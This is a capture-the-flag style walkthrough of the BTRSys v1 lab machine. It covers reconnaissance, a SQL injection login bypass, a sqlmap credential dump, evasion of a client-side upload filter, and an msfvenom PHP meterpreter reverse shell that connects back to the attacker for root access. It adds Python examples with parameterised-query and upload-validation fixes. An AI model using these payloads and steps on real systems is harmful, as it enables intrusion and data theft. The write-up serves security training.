BTRSys v1 markets itself as a boot2root for beginners. It's fairly simple, but almost all of the content covered is different from the covfefe box that we covered earlier. You can find the file here; it downloads as a .rar file that you can decompress and import into VMware.
Scanning
The first step is to find the target machine. We'll do that with an nmap ping sweep. First, identify our own address:
ifconfig eth1
Next to inet in the ifconfig output we see that our own address is 10.10.7.17. Now we can use nmap to identify the other machines on the subnet:
Nmap scan report for 10.10.7.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 10.10.7.22
Host is up (0.00038s latency).
MAC Address: 00:0C:29:09:29:3D (VMware)
Nmap scan report for 10.10.7.30
Host is up (0.00019s latency).
MAC Address: 00:50:56:F2:2B:81 (VMware)
Nmap scan report for 10.10.7.17
Host is up.
Nmap done: 32 IP addresses (4 hosts up) scanned in 26.69 seconds
Our target is at 10.10.7.22. The next step is to find out which services are reachable on it. We'll use nmap again, this time scanning all 65535 TCP ports with -A for service, version and OS detection:
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating ARP Ping Scan at 14:56
Scanning 10.10.7.22 [1 port]
Completed ARP Ping Scan at 14:56, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:56
Completed Parallel DNS resolution of 1 host. at 14:56, 13.00s elapsed
Initiating SYN Stealth Scan at 14:56
Scanning 10.10.7.22 [65535 ports]
Discovered open port 22/tcp on 10.10.7.22
Discovered open port 80/tcp on 10.10.7.22
Discovered open port 21/tcp on 10.10.7.22
Completed SYN Stealth Scan at 14:56, 1.89s elapsed (65535 total ports)
Initiating Service scan at 14:56
Scanning 3 services on 10.10.7.22
Completed Service scan at 14:56, 6.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.7.22
NSE: Script scanning 10.10.7.22.
Initiating NSE at 14:56
NSE: [ftp-bounce] Couldn't resolve scanme.nmap.org, scanning 10.0.0.1 instead.
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 14:56, 20.48s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Nmap scan report for 10.10.7.22
Host is up (0.00029s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.7.17
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 00:0C:29:09:29:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 196.483 days (since Fri Jun 2 04:20:57 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 10.10.7.22
NSE: Script Post-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
Key to note are ports 21, 22 and 80: the target is running FTP, SSH and a web server. The -A flag makes nmap fingerprint the services behind those ports and report their likely versions.
Knowing the exposed services and the version of each, we can turn to searchsploit to look for known exploits:
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Den | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Den | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (M | exploits/unix/remote/17491.rb
--------------------------------------------- ----------------------------------
Unfortunately, all of the vsftpd entries are for versions older than ours (3.0.2).
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
Debian OpenSSH - Authenticated Remote SELinu | exploits/linux/remote/6094.txt
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIE | exploits/multiple/dos/1572.pl
FreeBSD OpenSSH 3.5p1 - Remote Command Execu | exploits/freebsd/remote/17462.txt
Novell Netware 6.5 - OpenSSH Remote Stack Ov | exploits/novell/dos/14866.txt
OpenSSH 1.2 - '.scp' File Create/Overwrite | exploits/linux/remote/20253.sh
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-b | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token B | exploits/linux/remote/21402.txt
OpenSSH 3.x - Challenge-Response Buffer Over | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response Buffer Over | exploits/unix/remote/21579.txt
OpenSSH 4.3 p1 - Duplicated Block Remote Den | exploits/multiple/dos/2444.sh
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Es | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service | exploits/linux/dos/40888.py
OpenSSH 7.2p1 - Authenticated xauth Command | exploits/multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Lib | exploits/linux/remote/40963.txt
OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | exploits/linux/remote/26.sh
OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | exploits/linux/remote/25.c
OpenSSHd 7.2p2 - Username Enumeration (PoC) | exploits/linux/remote/40113.txt
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | exploits/multiple/remote/3303.sh
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - | exploits/linux/local/258.sh
--------------------------------------------- ----------------------------------
A note on searchsploit: including version numbers in the query cuts down the noise considerably. Searching for all OpenSSH entries, as above, returns a long list, and Apache would return even more, which makes it hard to spot the applicable ones. But a version in the search string can also hide entries that cover a range of versions: the two entries above that apply to OpenSSH < 7.4 would not match a search for "OpenSSH 6.6.1". Here it doesn't matter, because both < 7.4 entries require specific conditions (one needs UsePrivilegeSeparation disabled and local access, the other targets agent forwarding). We could note them and try them later to be sure, but that will prove unnecessary. The same goes for the Apache server, so we will move on and take a look at the FTP service.
Port 21
nmap reported that the FTP server on port 21 allows anonymous login. We'll quickly verify that, look for any files on the server, and check whether anonymous users can write:
220 (vsFTPd 3.0.2)
Name (10.10.7.22:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp>
ls shows no files on the server. A put confirms that anonymous users cannot upload either (550 Permission denied). This is a dead end, so we move on to port 80.
Port 80
There are two great tools for gathering information about a web server: nikto and dirb. Nikto scans a web server for known vulnerable files, outdated software and missing security headers; dirb takes a wordlist and brute-forces file and directory names. Between the two we get a good picture of what the server looks like and some potential attack vectors.
Starting with nikto:
---------------------------------------------------------------------------
+ Target IP: 10.10.7.22
+ Target Hostname: 10.10.7.22
+ Target Port: 80
+ Start Time: 2017-12-15 15:00:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7517 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2017-12-15 15:00:22 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Two things stand out: the file at /config.php and the login page at /login.php. Browsing to /config.php gives nothing but a blank page. That's fine; false positives happen with tools like this (strictly it isn't a false positive, since config.php does exist; PHP executes it server-side and it outputs nothing, so it is of little use to us). The login page at /login.php looks promising, and I'll come back to why after the dirb results:
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Dec 15 15:00:10 2017
URL_BASE: http://10.10.7.22/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.7.22/ ----
==> DIRECTORY: http://10.10.7.22/assets/
==> DIRECTORY: http://10.10.7.22/javascript/
+ http://10.10.7.22/server-status (CODE:403|SIZE:290)
==> DIRECTORY: http://10.10.7.22/uploads/
---- Entering directory: http://10.10.7.22/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.22/javascript/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery/
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/
---- Entering directory: http://10.10.7.22/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.22/javascript/jquery/ ----
+ http://10.10.7.22/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.7.22/javascript/jquery/version (CODE:200|SIZE:5)
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/css/
+ http://10.10.7.22/javascript/jquery-ui/jquery-ui (CODE:200|SIZE:434343)
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/ui/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/css/ ----
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/base/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ui/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/ui/i18n/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/base/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/base/images/
+ http://10.10.7.22/javascript/jquery-ui/themes/base/jquery-ui (CODE:200|SIZE:32266)
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ui/i18n/ ----
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/base/images/ ----
-----------------
END_TIME: Fri Dec 15 15:02:00 2017
DOWNLOADED: 204580 - FOUND: 5
There are a few things to notice. First, dirb missed login.php, which is why it helps to run the two tools together. The likely reason it missed login.php (login is certainly in the wordlist) is that dirb requested http://10.10.7.22/login, while the target's pages are PHP and carry a .php extension. Repeating the scan with the -X flag to append an extension turns up several files that did not appear before:
dirb http://10.10.7.22/ /usr/share/wordlists/dirb/big.txt -X .php
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Dec 15 17:41:04 2017
URL_BASE: http://10.10.7.22/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.7.22/ ----
+ http://10.10.7.22/config.php (CODE:200|SIZE:2)
+ http://10.10.7.22/index.php (CODE:200|SIZE:758)
+ http://10.10.7.22/login.php (CODE:200|SIZE:4561)
-----------------
END_TIME: Fri Dec 15 17:41:17 2017
DOWNLOADED: 20458 - FOUND: 3
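As an added example (this is not code from the write-up or from dirb itself), the Python below reproduces the part of dirb's behaviour that matters here: building the candidate list from a wordlist and an extension list, then keeping every response that is not a 404. It runs offline against a constructed table of paths that mirrors what the scans above found; http_fetch is a hypothetical live fetcher you would point at a target you are authorised to test. It generalises the page's single -X .php run by trying the bare word and the extension in one pass.

```python
import urllib.error
import urllib.request

# Constructed stand-in for the target's document root, keyed by request path and
# mirroring what nikto and "dirb -X .php" found. Not the real box.
FAKE_TARGET = {
    "/index.php": 200,
    "/login.php": 200,
    "/config.php": 200,
    "/assets/": 200,
    "/uploads/": 200,
    "/server-status": 403,
}

# A tiny constructed wordlist; dirb's big.txt is 20458 entries.
WORDS = ["admin", "assets", "config", "index", "login", "server-status", "uploads"]


def fake_fetch(path):
    """Offline fetcher: returns a status for `path` the way Apache would
    (a bare directory name 301-redirects to the slash form)."""
    if path in FAKE_TARGET:
        return FAKE_TARGET[path]
    if path + "/" in FAKE_TARGET:
        return 301
    return 404


def http_fetch(base_url, timeout=5):
    """Live fetcher factory for a real target (base_url is yours to supply).
    Redirects are not followed, so a bare directory name shows up as 301."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # turn the redirect into an HTTPError we report as-is

    opener = urllib.request.build_opener(NoRedirect)

    def fetch(path):
        req = urllib.request.Request(base_url.rstrip("/") + path, method="HEAD")
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code
    return fetch


def candidates(words, extensions=("",)):
    """dirb's candidate list: every word joined with every extension.
    The empty extension is the bare word, which is all plain dirb tries."""
    return ["/" + word + ext for word in words for ext in extensions]


def brute_force(fetch, words, extensions=("",), miss=(404,)):
    """Request every candidate and return {path: status} for all non-misses.
    403 and 301 are kept: they prove the path exists even if we can't read it."""
    hits = {}
    for path in candidates(words, extensions):
        status = fetch(path)
        if status not in miss:
            hits[path] = status
    return hits


if __name__ == "__main__":
    print("bare words:", brute_force(fake_fetch, WORDS))
    print("with .php: ", brute_force(fake_fetch, WORDS, ("", ".php")))
```

The first run reproduces the original dirb result (directories and server-status only); the second adds the three .php files. Against a live target, swap fake_fetch for http_fetch("http://host") and expect to tune `miss` for servers that answer 200 with a custom "not found" page.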
Let’s take a look at login.php.
Looking at the page source, there is a script at the bottom that does some client-side input validation intended to prevent SQL injection. Unfortunately for the target, the checks are weak and easily satisfied, and since they run in the browser they could be skipped entirely by sending the POST directly.
function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;
    // everything after the last "@" (the whole string when there is no "@")
    var str=user.substring(user.lastIndexOf("@")+1,user.length);
    if((pwd == "'")){
        alert("Hack Denemesi !!!");   // "Hack attempt !!!"
    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");   // "You are entering incorrect user information"
    }
    else{
        document.loginform.submit();
    }
}
The script performs two checks before submitting the form and shows an alert if either trips. The first rejects a password that is exactly a single quote ('), and nothing else. The second takes everything after the last "@" in the username and requires it to equal btrisk.com; when there is no "@", lastIndexOf returns -1 and the whole username is compared, so the username "btrisk.com" passes. Simple enough. Submitting username "btrisk.com" and password "a' or 1=1;#" (without the double quotes) logs us in and presents the next page:
EDIT: When I redid all of this for the write-up, the file upload page that we cover later began appearing right away. The first time I did this, it did not; I tried clearing caches and cookies, but it showed up every time. If you do not see a button to upload a file, ignore this edit and continue. If you do see one, you could skip down to the file upload section, but I'd recommend following the guide through the sqlmap password dumping anyway. Either way, know that your page may not look quite like the one above. As long as the URL says /personel.php, chances are that you're in the right place.
We now know that the portal is vulnerable to SQLi. At this point I pulled out sqlmap to do the heavy lifting: it automates the whole injection process and can dump some very handy information. (The output below is from a resumed session, so the detection phase is not shown.)
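As an added example, not code from the write-up or from the BTRSys box, the script below models the login in Python with an in-memory SQLite table. The two rows are constructed from the credentials that the sqlmap dump later in the write-up reveals, and the string-concatenated query is an assumed shape, since the target's PHP is not on the page. It ports the control() check, shows why the username btrisk.com satisfies it, and runs the injection against the vulnerable query and against a parameterised one. The comment is written as `-- ` (the form sqlmap's payload also uses) rather than `#`, because SQLite, unlike MySQL, does not treat `#` as a comment.

```python
import sqlite3


def make_db():
    """Constructed in-memory copy of deneme.user with only the columns the login
    needs. Passwords are stored in plain text, as on the box."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (ID INTEGER, Kullanici_Adi TEXT, Parola TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?, ?)", [
        (1, "ikaya@btrisk.com", "asd123***"),
        (2, "cdmir@btrisk.com", "asd123***"),
    ])
    return db


def client_control(user, pwd):
    """Python port of the page's control() JavaScript: True means the form is submitted."""
    domain = user[user.rfind("@") + 1:]   # rfind() is -1 with no '@', so this is the whole string
    if pwd == "'":
        return False                      # the only password the script refuses
    if domain != "btrisk.com":
        return False
    return True


def login_vulnerable(db, user, pwd):
    """Assumed shape of the target's query: both inputs concatenated straight into SQL."""
    sql = ("SELECT ID, Kullanici_Adi FROM user "
           "WHERE Kullanici_Adi='%s' AND Parola='%s'" % (user, pwd))
    return db.execute(sql).fetchall()


def login_fixed(db, user, pwd):
    """Same query with bound parameters: the inputs can never change the SQL's structure."""
    sql = "SELECT ID, Kullanici_Adi FROM user WHERE Kullanici_Adi=? AND Parola=?"
    return db.execute(sql, (user, pwd)).fetchall()


# The injection: closes the Parola literal, ORs in a tautology and comments out the
# trailing quote. AND binds tighter than OR, so the WHERE clause becomes
# (user matches AND password matches) OR 1=1, which is true for every row.
PAYLOAD = "a' or 1=1-- "


if __name__ == "__main__":
    db = make_db()
    print("client check passes:      ", client_control("btrisk.com", PAYLOAD))
    print("vulnerable query returns: ", login_vulnerable(db, "btrisk.com", PAYLOAD))
    print("parameterised query gives:", login_fixed(db, "btrisk.com", PAYLOAD))
    print("real credentials, fixed:  ", login_fixed(db, "ikaya@btrisk.com", "asd123***"))
```

The vulnerable query returns both rows, and an application that takes the first row as "the" authenticated user logs the attacker in as ikaya@btrisk.com without a password. The parameterised version returns nothing for the payload and still works for genuine credentials, which is the whole fix: the JavaScript check is cosmetic and can be left in place or removed, it makes no difference to the server.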
sqlmap {1.1.12#stable} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:40:01
[15:40:02] [INFO] resuming back-end DBMS 'mysql'
[15:40:02] [INFO] testing connection to the target URL
[15:40:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kullanici_adi (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: kullanici_adi=lPmV' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvqzq','gzvTEybPtEhGrVJZSjungxLbHEzqbluthgFduNEB'),'qjzqq'),NULL-- jKCi&parola=
---
[15:40:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
[15:40:02] [INFO] fetching database names
available databases [4]:
[*] deneme
[*] information_schema
[*] mysql
[*] performance_schema
[15:40:02] [INFO] fetching tables for databases: 'deneme, information_schema, mysql, performance_schema'
Database: deneme
...
!!Abbreviated Output!!
...
[15:40:02] [INFO] fetching columns for table 'user' in database 'deneme'
[15:40:02] [INFO] fetching entries for table 'user' in database 'deneme'
Database: deneme
Table: user
[2 entries]
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| ID | Parola | BabaAdi | AnneAdi | Ad_Soyad | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| 1 | asd123*** | ahmet | nazli | ismail kaya | lokantaci | muhasebe | 5 | ikaya@btrisk.com |
| 2 | asd123*** | mahmut | gulsah | can demir | tuhafiyeci | memur | 8 | cdmir@btrisk.com |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
[15:40:02] [INFO] table 'deneme.`user`' dumped to CSV file '/root/.sqlmap/output/10.10.7.22/dump/deneme/user.csv'
[15:40:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.7.22'
[*] shutting down at 15:40:02
Towards the end of the abbreviated output there is a user table with two entries. If you haven't noticed by now, the box is in Turkish, so the following translations of the column names are useful:
Parola          Password
BabaAdi         Father's name
AnneAdi         Mother's name
Ad_Soyad        Name and surname
AnneMeslegi     Mother's occupation
BabaMeslegi     Father's occupation
KardesSayisi    Number of siblings
Kullanici_Adi   Username
Looking at the user table again, we have two usernames and passwords, stored in plain text. Returning to the login portal at /login.php and logging in with the first set of creds (ikaya@btrisk.com:asd123***) brings us back to /personel.php, but this time there is a file upload form present.
Looking at the page's source, there is again some JavaScript at the bottom, this time handling the file upload.
// accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    // extension = text after the last "." (undefined when there is no ".");
    // exec() returns a match array, which == coerces to its string
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        document.myform.submit();
    }else{
        //mesaj
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");   // "You can only upload JPG,PNG files."
        return false;
    }
}
They only allow .jpg, .png and .gif uploads. That is normal; it keeps users from uploading things like PHP code that could spawn a reverse shell (hint). Unfortunately for them, the check runs only on the client side, and the server stores whatever filename arrives in the POST. So we name our .php file with an image extension to satisfy the JavaScript, intercept the POST, change the extension back to .php, and the server stores and serves it like any other PHP file. Let's give it a try.
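As an added example (not code from the write-up or from the box), here is the server-side counterpart of getFile() in Python: the validation the upload handler should have done. It ports the client check, then shows a server validator that allowlists the extension, checks the file's magic bytes against that extension, refuses anything containing a PHP open tag, and stores the file under a name the server chooses. The sample bytes are constructed stand-ins, not the msfvenom payload, and the function names are mine.

```python
import secrets

# Allowlisted extensions and the signature bytes a file claiming each must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample inputs (not the page's payload): a harmless PHP file and a
# buffer that carries only the PNG signature plus padding.
PHP_STUB = b"<?php /* constructed stand-in for the msfvenom file; does nothing */ ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def client_check(filename):
    """Python port of the page's getFile(): accept if the text after the last '.'
    is exactly jpg, gif or png. The uploader controls this value completely."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else None
    return ext in ("jpg", "gif", "png")


def server_validate(client_filename, data):
    """Server-side decision. Returns (True, stored_name) or (False, reason).

    The client's filename contributes nothing but a candidate extension; the
    stored name is generated here, so a renamed rshell.php never reaches uploads/.
    """
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in MAGIC:
        return False, "extension %r not in allowlist" % ext
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not start with a %s signature" % ext
    if b"<?php" in data or b"<?=" in data:
        # Defence in depth against image/PHP polyglots; the real fix is to never
        # execute anything under uploads/ (see the note below the block).
        return False, "embedded PHP open tag"
    stored_name = secrets.token_hex(16) + "." + ext
    return True, stored_name


if __name__ == "__main__":
    for name, data in (("rshell.jpg", PHP_STUB), ("rshell.php", PHP_STUB), ("photo.png", PNG_STUB)):
        print(name, "client:", client_check(name), "server:", server_validate(name, data))
```

rshell.jpg passes the client check and is rejected by the server because its bytes are not a JPEG; rshell.php, the renamed request, is rejected on extension alone; a genuine PNG is stored under a random name. Even with this validator in place, the uploads directory should be served with PHP execution disabled (with mod_php, `php_admin_flag engine off` in that directory's configuration) so that anything that slips through is still inert.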
First we’ll generate our payload. We want to create a reverse tcp shell so that we can gain access to the box. Using msfvenom, we can create a payload that will open a meterpreter instance that we can interact with via metasploit. Set the port and IP that your test machine will listen on for the target to connect to.
1 | msfvenom -p php/meterpreter/reverse_tcp LPORT=52801 LHOST=10.10.7.17 -o rshell.jpg |
Next, edit the file and remove the /* at the beginning of the file:
/*<?php /**/ error_reporting(0); $ip = '10.10.7.17'; $port = 52801; if (.......
should change to:
<?php /**/ error_reporting(0); $ip = '10.10.7.17'; $port = 52801; if (.......
If we upload this file now, the form allows it because it thinks the file is an image. But before clicking 'Gonder' (Send) we need to be ready to intercept the POST. There are many ways to do this; I like a Firefox extension called Tamper Data. It's simple, easy to use, and one less program to keep open. Once it's installed, go to Tools and click Tamper Data.
Click Start Tamper, then click 'Gonder' to upload the file. Tamper Data prompts for the request; click Tamper.
You will most likely see prompts for other requests going to other URLs while you are tampering; just submit those. Only the request going to the target IP matters. Edit that request and change the uploaded filename's extension from .jpg to .php.
Click Submit and stop tampering. You should see a page indicating that the file was uploaded, and navigating to /uploads/ should show your file there.
Our payload is on the target. Before executing it, we need to set our machine up to handle the incoming connection. Open Metasploit and wait for it to start:
msfconsole
Once it is open, we need the multi/handler module. This is a particularly useful module that connects the framework to payloads launched outside of it (as here, where we uploaded the payload manually and will trigger it ourselves). Configure it as follows:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.7.17
set LPORT 52801
run
Change the values to match your own environment. The payload, LHOST and LPORT must match the msfvenom command above, otherwise the connection will fail. After run, you should see something like:
[*] Started reverse TCP handler on 10.10.7.17:52801
This indicates that the handler is listening on 10.10.7.17:52801. Now, in your browser, browse to http://10.10.7.22/uploads/rshell.php, or simply click the file in the /uploads/ listing. The server executes the PHP, which connects back to the handler. A successful execution looks like:
[*] Started reverse TCP handler on 10.10.7.17:52801
[*] Sending stage (37543 bytes) to 10.10.7.22
[*] Meterpreter session 3 opened (10.10.7.17:52801 -> 10.10.7.22:51767) at 2017-12-15 23:01:40 -0500
meterpreter >
There are a number of commands available from here; type shell and hit enter to get a shell on the target. The next step is to upgrade the limited shell we now have: it has no pty, so interactive commands such as su and sudo, which need a terminal for their password prompt, fail. The following line is extremely useful and works almost any time python is present on the target.
meterpreter > shell
Process 4267 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@BTRsys1:/var/www/html/uploads$
Escalation
You should now have a familiar-looking bash shell, running as www-data. Normally this is where we would start gathering information from the machine itself and look for a privilege escalation. But one thing I always try first in the lab is whether any of the creds I already have were reused, or whether the current user can simply sudo or su to root. The chance of www-data having sudo rights is next to nil. But what about the password that both web users shared? Perhaps it was reused:
su -
Password: asd123***
root@BTRsys1:~#
And we have root. This is why I always check what I already have before crawling the system for vulnerabilities that may not even exist; it can save hours of wasted effort. At this point we have accomplished the goal of the box. You can look for other data, try to crack the hashes in /etc/shadow (we already know one of them!), and so on. Overall, a good, friendly boot2root that touches on some good web vulnerabilities. For an extra challenge, skip sqlmap and work out how to get the same information by hand. Props to ismailonderkaya on the box, I enjoyed it!